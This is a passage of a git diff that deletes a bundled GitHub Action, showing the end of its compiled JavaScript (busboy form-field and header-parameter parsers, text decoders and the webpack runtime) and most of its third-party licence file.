p, idxeq)) } - this._state = 'val' - - this._hitLimit = false - this._checkingBytes = true - this._val = '' - this._bytesVal = 0 - this._valTrunc = false - this.decoder.reset() - - p = idxeq + 1 - } else if (idxamp !== undefined) { - // key with no assignment - ++this._fields - let key; const keyTrunc = this._keyTrunc - if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - if (key.length) { - this.boy.emit('field', decodeText(key, 'binary', this.charset), - '', - keyTrunc, - false) - } - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... - if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._keyTrunc = true - } - } else { - if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } - p = len - } - } else { - idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesVal } - } - - if (idxamp !== undefined) { - ++this._fields - if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - this._state = 'key' - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... - if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._val === '' && this.fieldSizeLimit === 0) || - (this._bytesVal = this._val.length) === this.fieldSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._valTrunc = true - } - } else { - if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } - p = len - } - } - } - cb() -} - -UrlEncoded.prototype.end = function () { - if (this.boy._done) { return } - - if (this._state === 'key' && this._key.length > 0) { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - '', - this._keyTrunc, - false) - } else if (this._state === 'val') { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - } - this.boy._done = true - this.boy.emit('finish') -} - -module.exports = UrlEncoded - - -/***/ }), - -/***/ 7100: -/***/ ((module) => { - -"use strict"; - - -const RE_PLUS = /\+/g - -const HEX = [ - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -] - -function Decoder () { - this.buffer = undefined -} -Decoder.prototype.write = function (str) { - // Replace '+' with ' ' before decoding - str = str.replace(RE_PLUS, ' ') - let res = '' - let i = 0; let p = 0; const len = str.length - for (; i < len; ++i) { - if (this.buffer !== undefined) { - if (!HEX[str.charCodeAt(i)]) { - res += '%' + this.buffer - this.buffer = undefined - --i // retry character - } else { - this.buffer += str[i] - ++p - if (this.buffer.length === 2) { - res += String.fromCharCode(parseInt(this.buffer, 16)) - this.buffer = undefined - } - } - } else if (str[i] === '%') { - if (i > p) { - res += str.substring(p, i) - p = i - } - this.buffer = '' - ++p - } - } - if (p < len && this.buffer === undefined) { res += str.substring(p) } - return res -} -Decoder.prototype.reset = function () { - this.buffer = undefined -} - -module.exports = Decoder - - -/***/ }), - -/***/ 8647: -/***/ ((module) => { - -"use strict"; - - -module.exports = function basename (path) { - if (typeof path !== 'string') { return '' } - for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var - switch (path.charCodeAt(i)) { - case 0x2F: // '/' - case 0x5C: // '\' - path = path.slice(i + 1) - return (path === '..' || path === '.' ? '' : path) - } - } - return (path === '..' || path === '.' ? '' : path) -} - - -/***/ }), - -/***/ 4619: -/***/ (function(module) { - -"use strict"; - - -// Node has always utf-8 -const utf8Decoder = new TextDecoder('utf-8') -const textDecoders = new Map([ - ['utf-8', utf8Decoder], - ['utf8', utf8Decoder] -]) - -function getDecoder (charset) { - let lc - while (true) { - switch (charset) { - case 'utf-8': - case 'utf8': - return decoders.utf8 - case 'latin1': - case 'ascii': // TODO: Make these a separate, strict decoder? - case 'us-ascii': - case 'iso-8859-1': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'windows-1252': - case 'iso_8859-1:1987': - case 'cp1252': - case 'x-cp1252': - return decoders.latin1 - case 'utf16le': - case 'utf-16le': - case 'ucs2': - case 'ucs-2': - return decoders.utf16le - case 'base64': - return decoders.base64 - default: - if (lc === undefined) { - lc = true - charset = charset.toLowerCase() - continue - } - return decoders.other.bind(charset) - } - } -} - -const decoders = { - utf8: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.utf8Slice(0, data.length) - }, - - latin1: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - return data - } - return data.latin1Slice(0, data.length) - }, - - utf16le: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.ucs2Slice(0, data.length) - }, - - base64: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.base64Slice(0, data.length) - }, - - other: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - - if (textDecoders.has(this.toString())) { - try { - return textDecoders.get(this).decode(data) - } catch (e) { } - } - return typeof data === 'string' - ? data - : data.toString() - } -} - -function decodeText (text, sourceEncoding, destEncoding) { - if (text) { - return getDecoder(destEncoding)(text, sourceEncoding) - } - return text -} - -module.exports = decodeText - - -/***/ }), - -/***/ 1467: -/***/ ((module) => { - -"use strict"; - - -module.exports = function getLimit (limits, name, defaultLimit) { - if ( - !limits || - limits[name] === undefined || - limits[name] === null - ) { return defaultLimit } - - if ( - typeof limits[name] !== 'number' || - isNaN(limits[name]) - ) { throw new TypeError('Limit ' + name + ' is not a valid number') } - - return limits[name] -} - - -/***/ }), - -/***/ 1854: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* eslint-disable object-property-newline */ - - -const decodeText = __nccwpck_require__(4619) - -const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g - -const EncodedLookup = { - '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', - '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', - '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', - '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', - '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', - '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', - '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', - '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', - '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', - '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', - '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', - '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', - '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', - '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', - '%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', - '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', - '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', - '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', - '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', - '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', - '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', - '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', - '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', - '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', - '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', - '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', - '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', - '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', - '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', - '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', - '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', - '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', - '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', - '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', - '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', - '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', - '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', - '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', - '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', - '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', - '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', - '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', - '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', - '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', - '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', - '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', - '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', - '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', - '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', - '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', - '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', - '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', - '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', - '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', - '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', - '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', - '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', - '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', - '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', - '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', - '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', - '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', - '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', - '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', - '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', - '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': '\xca', - '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', - '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', - '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', - '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', - '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', - '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', - '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', - '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', - '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', - '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', - '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', - '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', - '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', - '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', - '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', - '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', - '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', - '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', - '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', - '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', - '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', - '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', - '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', - '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', - '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', - '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', '%F9': '\xf9', - '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', - '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', - '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', - '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', - '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' -} - -function encodedReplacer (match) { - return EncodedLookup[match] -} - -const STATE_KEY = 0 -const STATE_VALUE = 1 -const STATE_CHARSET = 2 -const STATE_LANG = 3 - -function parseParams (str) { - const res = [] - let state = STATE_KEY - let charset = '' - let inquote = false - let escaping = false - let p = 0 - let tmp = '' - const len = str.length - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - const char = str[i] - if (char === '\\' && inquote) { - if (escaping) { escaping = false } else { - escaping = true - continue - } - } else if (char === '"') { - if (!escaping) { - if (inquote) { - inquote = false - state = STATE_KEY - } else { inquote = true } - continue - } else { escaping = false } - } else { - if (escaping && inquote) { tmp += '\\' } - escaping = false - if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { - if (state === STATE_CHARSET) { - state = STATE_LANG - charset = tmp.substring(1) - } else { state = STATE_VALUE } - tmp = '' - continue - } else if (state === STATE_KEY && - (char === '*' || char === '=') && - res.length) { - state = char === '*' - ? STATE_CHARSET - : STATE_VALUE - res[p] = [tmp, undefined] - tmp = '' - continue - } else if (!inquote && char === ';') { - state = STATE_KEY - if (charset) { - if (tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } - charset = '' - } else if (tmp.length) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } - tmp = '' - ++p - continue - } else if (!inquote && (char === ' ' || char === '\t')) { continue } - } - tmp += char - } - if (charset && tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } else if (tmp) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - - if (res[p] === undefined) { - if (tmp) { res[p] = tmp } - } else { res[p][1] = tmp } - - return res -} - -module.exports = parseParams - - -/***/ }) - -/******/ }); -/************************************************************************/ -/******/ // The module cache -/******/ var __webpack_module_cache__ = {}; -/******/ -/******/ // The require function -/******/ function __nccwpck_require__(moduleId) { -/******/ // Check if module is in cache -/******/ var cachedModule = __webpack_module_cache__[moduleId]; -/******/ if (cachedModule !== undefined) { -/******/ return cachedModule.exports; -/******/ } -/******/ // Create a new module (and put it into the cache) -/******/ var module = __webpack_module_cache__[moduleId] = { -/******/ // no module.id needed -/******/ // no module.loaded needed -/******/ exports: {} -/******/ }; -/******/ -/******/ // Execute the module function -/******/ var threw = true; -/******/ try { -/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); -/******/ threw = false; -/******/ } finally { -/******/ if(threw) delete __webpack_module_cache__[moduleId]; -/******/ } -/******/ -/******/ // Return the exports of the module -/******/ return module.exports; -/******/ } -/******/ -/************************************************************************/ -/******/ /* webpack/runtime/compat */ -/******/ -/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; -/******/ -/************************************************************************/ -/******/ -/******/ // startup -/******/ // Load entry module and return exports -/******/ // This entry module is referenced by other modules so it can't be inlined -/******/ var __webpack_exports__ = __nccwpck_require__(6144); -/******/ module.exports = __webpack_exports__; -/******/ -/******/ })() -; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt deleted file mode 100644 index cd36a2d85eff..000000000000 --- a/.github/action/dist/licenses.txt +++ /dev/null @@ -1,175 +0,0 @@ -@actions/core -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/exec -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/http-client -MIT -Actions Http Client for Node.js - -Copyright (c) GitHub, Inc. - -All rights reserved. - -MIT License - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and -associated documentation files (the "Software"), to deal in the Software without restriction, -including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT -LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN -NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - -@actions/io -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/tool-cache -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@fastify/busboy -MIT -Copyright Brian White. All rights reserved. - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to -deal in the Software without restriction, including without limitation the -rights to use, copy, modify, merge, publish, distribute, sublicense, and/or -sell copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS -IN THE SOFTWARE. - -semver -ISC -The ISC License - -Copyright (c) Isaac Z. Schlueter and Contributors - -Permission to use, copy, modify, and/or distribute this software for any -purpose with or without fee is hereby granted, provided that the above -copyright notice and this permission notice appear in all copies. - -THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR -IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - - -tunnel -MIT -The MIT License (MIT) - -Copyright (c) 2012 Koichi Kobayashi - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. - - -undici -MIT -MIT License - -Copyright (c) Matteo Collina and Undici contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 